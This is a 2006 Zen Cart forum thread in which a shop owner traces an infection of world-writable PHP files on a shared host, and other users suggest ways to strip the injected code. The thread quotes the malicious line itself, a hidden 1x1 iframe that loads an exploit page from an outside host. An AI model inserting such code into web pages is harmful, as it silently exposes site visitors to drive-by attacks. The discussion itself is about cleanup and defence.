Zen Cart Logo
Forums / General Questions / A VIRAL Problem!

A VIRAL Problem!

Locked

Views: 7,529

Results 21 to 40 of 46
This thread is locked. New replies are disabled.
27 Jun 2006, 9:05 PM
#21
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

A VIRAL Problem!

Kim:

For the third time- This is not coming from Zen Cart - The Trojan is getting into your files that are chmod 777, but the Trojan is ON THE SERVER.
Exactly Kim - and I've been telling them just that until I'm blue in the face! If you look at the copies of the messages above that have been flying between me and Hosgator you'll see what I mean.

G

27 Jun 2006, 9:40 PM
#22
drbyte avatar

drbyte

Sensei

Join Date:
Jan 2004
Posts:
63,513
Plugin Contributions:
176

Re: A VIRAL Problem!

I doubt you'll get any further with Hostgator.

  1. Zen Cart is clean
  2. Your customized files got exploited due to folder permissions.
  3. Zen Cart suggests those folders be chmod 777 for editing purposes, and our security docs recommend downgrading that to 644 or so once your content is up-to-date and static.
  4. Our security docs also recommend the use of further .htaccess files in sensitive places if you feel the need, with some examples.
  5. We cannot and will not anticipate how effectively each host's configuration will operate vis a vis security issues; all we can do is provide guidelines.
    Whether further .htaccess files would have protected you in this case is unknown... and only a minimal likelihood.

It's the 777 that left you vulnerable to whatever someone else on the server was doing. I suspect some blog or forum software in someone else's account got hacked, and from there, the hacker ran a program to scan folders and look for writable files, and then replicated its content.

Your host could implement open_basedir restrictions to help guard against that.

But, that's up to them and how seriously they take security concerns.
Your part is just to close the door to your files... chmod...

27 Jun 2006, 10:07 PM
#23
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

DrByte:

I doubt you'll get any further with Hostgator.

  1. Zen Cart is clean
  2. Your customized files got exploited due to folder permissions.
  3. Zen Cart suggests those folders be chmod 777 for editing purposes, and our security docs recommend downgrading that to 644 or so once your content is up-to-date and static.
  4. Our security docs also recommend the use of further .htaccess files in sensitive places if you feel the need, with some examples.
  5. We cannot and will not anticipate how effectively each host's configuration will operate vis a vis security issues; all we can do is provide guidelines.
    Whether further .htaccess files would have protected you in this case is unknown... and only a minimal likelihood.

It's the 777 that left you vulnerable to whatever someone else on the server was doing. I suspect some blog or forum software in someone else's account got hacked, and from there, the hacker ran a program to scan folders and look for writable files, and then replicated its content.

Your host could implement open_basedir restrictions to help guard against that.

But, that's up to them and how seriously they take security concerns.
Your part is just to close the door to your files... chmod...

Yes it's becoming as clear as day what has happened. The CHMOD 777 was open on certain files because I was in the process of setting the damned thing up. I'm still seething with Hosgator. I'm not prepared to let go of the bone that easily. They need to come up with answers and not fob-offs, if they came clean it would be easier to accept. It's obvious to me that there's an exploit file running wild on their servers, and as far as I'm concerned that's their security liability, they should have to answer for it.

The other problem is the hassle of changing hosts. I've got quite a few sites with them and I was lining up a Reseller account with them. I really could do without this!!!

Thanks Doc - you've been a great help.

G

27 Jun 2006, 10:10 PM
#24
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

I think that Big Gee knows that it's not Zen Cart - it's HostGator who are busy trying to pass the buck.

Vger

27 Jun 2006, 10:25 PM
#25
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Vger:

I think that Big Gee knows that it's not Zen Cart - it's HostGator who are busy trying to pass the buck.

Vger

That's right Vger - it's either I'm not expressing myself well enough for others to understand or Kim's parrot is squaking so loudly she can't hear herself reading!!

Absolutely no problem with ZC (and I never suggested there was), in fact I've been sweating pints fighting ZCs corner after Hostgator started shifting the blame in that direction.

Thanks,

G

28 Jun 2006, 6:30 PM
#26
xt0rt avatar

xt0rt

Zen Follower

Join Date:
Sep 2005
Location:
The Internets
Posts:
179
Plugin Contributions:
0

Re: A VIRAL Problem!

The irresponsibility of many of these bigname hosts sickens me to no end. Whether it be overloaded servers, hijacked servers, or ****ty customer service they never take responsibility for problems that arise on their end. All they care about is that next monthly payment. The worst part is they have so many customers that if you leave them it really doesn't matter.

My advice, again, would be to switch hosts. There are other good ones out there with referral programs. Second, get on some forums and host review sites and let Hostgator know you're not just another naive cash flow opportunity.

28 Jun 2006, 8:10 PM
#27
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

xt0rt:

The irresponsibility of many of these bigname hosts sickens me to no end. Whether it be overloaded servers, hijacked servers, or ****ty customer service they never take responsibility for problems that arise on their end. All they care about is that next monthly payment. The worst part is they have so many customers that if you leave them it really doesn't matter.

My advice, again, would be to switch hosts. There are other good ones out there with referral programs. Second, get on some forums and host review sites and let Hostgator know you're not just another naive cash flow opportunity.

Yes I know, but they are sensitive about bad publicity that CAN hurt. On the bright side I got the big "climb down" today (see a copy below). However this is only the start - they now need to get their act together to convince me they're going to do something about their security. By default certain files have to have "write" attributes to work correctly. Everyone should be able to work in an environment where the host company can be trusted to protect people up to a reasonable standard in those circumstances - at present Hostgator obviously don't.

I'll keep you posted.

Regards,

G

Gwilym,

You are correct that there could in fact be a script located on the server hunting for writeable scripts: However at this time we're unable to find one.

I'd highly recommend following the advice in the thread you've posted.
The specific one is:

DannoUK - what's almost certainly happened is this:

A malicious script has been set loose on the webhosts server.
That script searches for files that it can write to.
Such files are usually theme files.
This is not WP hacking as much a combination of a webhost security and your file permissions.

Download your current theme.
Go through each file in that theme checking for the garbage code.
Delete it all obviously
Upload the files and then change their permissions to 644 and NO higher. No 664 / 666 or anything else.
Check the site works.
If not, check your file editing.

You cannot now edit files online.

NO files on a site should ever be writable and if they are you must know where, why and the risks.

Let us know if you have any further questions or concerns.

Dave M.
Hostgator Customer Support

29 Jun 2006, 8:14 PM
#28
xt0rt avatar

xt0rt

Zen Follower

Join Date:
Sep 2005
Location:
The Internets
Posts:
179
Plugin Contributions:
0

Re: A VIRAL Problem!

Be persistent like herpes until they resolve the situation.:bangin:

4 Jul 2006, 1:54 PM
#29
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

I've just downloaded the whole of my ZC files from my host's server to a folder on my PC. I've checked a few PHP files in the html_includes folder and every one seems to be infected with the this rogue line of coding

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

I now have three choices:

  1. Sit down for hours going through each and every file and manually removing the above line when found.:ohmy:

  2. Deleting the whole file-set and starting again :( or

  3. Getting my hands on some editing software that will scan each and every file in the downloaded "suspect" files folder and then either delete or replace the spurious line with one command. :yes:

Does anyone know of such a piece of software kit? I've got Winmerge but from what I can see of that (good as it seems) it only allows you to open a selected file in one pane and then compares it to another selected file of your choice in a second pane and then it allowing you to merge any changes into one resulting file. Doing that will take longer than opening each file in a text editor and using the "replace" edit function to delete the iframe string.

Can someone help?

G

4 Jul 2006, 1:58 PM
#30
ajeh avatar

ajeh

Oba-san

Join Date:
Sep 2003
Location:
Ohio
Posts:
62,757
Plugin Contributions:
1

Re: A VIRAL Problem!

Get the files from our get Zen Cart link at the top of the page ...

It sounds like what ever you are using to install has a serious problem that you should make your hosting site aware of ...

That is not part of the original Zen Cart ...

If you download from here and upload those files and that shows up again ... then there is a more serious issue happening that needs to be addressed ...

4 Jul 2006, 2:16 PM
#31
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

You should have a virus scanner insatlled on your computer anyway (otherwise why would you download infected files to it), so use that to 'Scan In Files'.

Vger

4 Jul 2006, 2:17 PM
#32
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Ajeh:

Get the files from our get Zen Cart link at the top of the page ...

It sounds like what ever you are using to install has a serious problem that you should make your hosting site aware of ...

That is not part of the original Zen Cart ...

If you download from here and upload those files and that shows up again ... then there is a more serious issue happening that needs to be addressed ...
Thanks Ajeh,

Yes, yes, I know all that - if you scroll through from the beginning of this thread you'll see that the source of the problem is well documented (along with some of my correspondence quotes with the hosting company). It is NOT A PROBLEM WITH THE ZC CODING - I've pointed this out more than once. There's an exploit script running wild on the Hosgator servers that's hunting down PHP files with CHMOD attributes that it can attack. It inserts the iframe string into those files. When a specific file is viewed in IE any anti viral softawre reports a Hacktool.IE.exploit warning.

Everything is in hand. What I need is a shortcut method to remove the iframe string from all infected files, after which the ZC fileset will be moved to a more secure and clean host company. in the mean time the "shop" site has been closed down to the public.

G

4 Jul 2006, 2:22 PM
#33
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Vger:

You should have a virus scanner insatlled on your computer anyway (otherwise why would you download infected files to it), so use that to 'Scan In Files'.

Vger

Oh goodness this is being over complicated by everyone! The actual inserted iframe string IS NOT A VIRUS. I've obviously got AV software on my computer. However what I need to do is remove the spurious string from all PHP files that have had it inserted by the EXPLOIT SCRIPT ON THE SERVER.

G

4 Jul 2006, 2:47 PM
#34
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

Download and install Text Pad, use the Find in Files feature to find all references to that code, and then use replace to replace it with nothing.

Vger

4 Jul 2006, 2:51 PM
#35
ajeh avatar

ajeh

Oba-san

Join Date:
Sep 2003
Location:
Ohio
Posts:
62,757
Plugin Contributions:
1

Re: A VIRAL Problem!

Well the easy way is if they are php files with that stuck on them ...

Use the Tools ... Developer's Tool Kit ... and do a search ... iframe does not exist in Zen Cart so it would be a good word to search for in the bottom input box ...

Personally I would use that and Beyond Compare from scootersoftware.com and do an FTP compare of a clean Zen Cart ...

4 Jul 2006, 3:07 PM
#36
kobra avatar

kobra

Black Belt

Join Date:
Aug 2005
Location:
Arizona
Posts:
31,500
Plugin Contributions:
4

Re: A VIRAL Problem!

G,

Winmerge will batch compare full folders & sub-folders contained within.

The easiest way that I have found is to FTP your shop folder to your PC and insure that you have the original ZC fileset folder on your PC also.
Then select the open window in winmerge and clear the 2 selection areas.
Then open Winxplorer and navigate to the folder that you want & drag & drop it into one of the winmerge selection areas.
Navigate in explorer to the second folder & drag & drop into the other winmerge area. In winmerge check the sub-folder box and select OK and it will compare all files contained within the folders listing those that are identical and those that are different.
Selecting 'view' and you can select only different files.
This should short cut the # of files that you must have to look at.

4 Jul 2006, 3:09 PM
#37
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Vger:

Download and install Text Pad, use the Find in Files feature to find all references to that code, and then use replace to replace it with nothing.

Vger

Excellent - thank you Vger, I'll download it straight away.

G

4 Jul 2006, 3:12 PM
#38
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Ajeh:

Well the easy way is if they are php files with that stuck on them ...

Use the Tools ... Developer's Tool Kit ... and do a search ... iframe does not exist in Zen Cart so it would be a good word to search for in the bottom input box ...

Personally I would use that and Beyond Compare from scootersoftware.com and do an FTP compare of a clean Zen Cart ...

Thank you Ajeh - I'll check that out.

G

4 Jul 2006, 3:18 PM
#39
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

kobra:

G,

Winmerge will batch compare full folders & sub-folders contained within.

The easiest way that I have found is to FTP your shop folder to your PC and insure that you have the original ZC fileset folder on your PC also.
Then select the open window in winmerge and clear the 2 selection areas.
Then open Winxplorer and navigate to the folder that you want & drag & drop it into one of the winmerge selection areas.
Navigate in explorer to the second folder & drag & drop into the other winmerge area. In winmerge check the sub-folder box and select OK and it will compare all files contained within the folders listing those that are identical and those that are different.
Selecting 'view' and you can select only different files.
This should short cut the # of files that you must have to look at.

Hello kobra,

I could do that BUT a comaprison with a pre installation clean file-set will throw up all the changes between those files and those changed post installation, including bone fide changes.

As I know exactly what the spurious string is what I need is something that will hunt down all occurances of that string in ALL files and then replace it in them with nothing.

It sounds as if Vger has the solution with TextPad.

Many Thanks,

G

4 Jul 2006, 4:36 PM
#40
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

xt0rt:

Be persistent like herpes until they resolve the situation.:bangin:

They seem to be "Herpes" immune!

Here's the latest response received today:

We understand that such issues can be frustrating, but there is no blame being passed, simply the facts of the matter. To clarify, we do not run PHP in the Apache API, we force it to run in the CGI API, and it makes use of a modified version of the suexec CGI wrapper, called phpsuexec. This means any PHP (or CGI) scripts run as your own user, and not the global web server user (called "nobody") that other hosts are known to use. This offers a lot of advantages, but a primary one is better security by allowing users to set their files to chmod 400, 600, 640, 660, 700, 710, 711, 755, etc. depending on the file, and deny any execute, write/modify or even read access to any other users on the system.

The issue still exists in that it's a shared server. However, that said, we still take measures to deny access to things like find, and many modules and paths and directories via security settings to help prevent the majority of exploits. We take it further by implementing such things as mod_security, we have custom firewalls to prevent scripts/users from binding to local ports to listen for connections with a backdoor, etc., or to connect out over non valid ports as well. We have many settings and restrictions, but being how technology is with web servers and it being a shared server environment, there are still means one could use (though limited) to cause issues with another users' site. So, secure scripts and more appropriate permissions are required for you to have a secure environment for your account--this will effectively prevent all issues from other users/scripts. Only if your own scripts are insecure would a problem be present. Thus, any instructions telling you to set any files or directories to be world write/modify are absolutely unneeded and will only pose a risk.

Regards,
Tim Greer
Systems Administrator - HostGator.com, LLC.

This would seem to imply that my scripts are insecure and by extension Zen Cart's. Consequently it's MY fault and not the host!

Zen Cart recommend:

CHMOD 777 for
/cache
/pub
/images
/includes/languages/english/html_includes
/admin/backups
/admin/images/graphs

These to 444 or 644
/includes/configure.php
/admin/includes/configure.php

So how does a new ZC installer square this? By using a reliable and secure host - but Hostgator insist they are! :wacko:

The only one suffering in all of this is muggins here - with a website down and a cartload of problems to resolve to get it back up - regardless of where I take my hosting business.

G